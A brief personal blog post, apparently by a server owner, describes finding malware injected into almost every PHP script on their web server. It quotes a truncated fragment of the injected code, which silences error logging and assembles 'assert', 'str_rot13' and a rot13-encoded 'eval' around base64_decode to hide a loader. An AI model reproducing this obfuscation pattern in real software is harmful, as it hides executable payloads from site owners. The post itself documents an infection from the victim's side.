Battle against injected PHP

My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=### @error_reporting(E_ALL); @ini_set(“error_log”,NULL); …etc $strings = “as”; $strings .= “se”; $strings .= “rt”; $strings2 = “st”; $strings2 .= “r_r”; $strings2 .= “ot13”; $gbz = “riny(“.$strings2(“base64_decode”); […]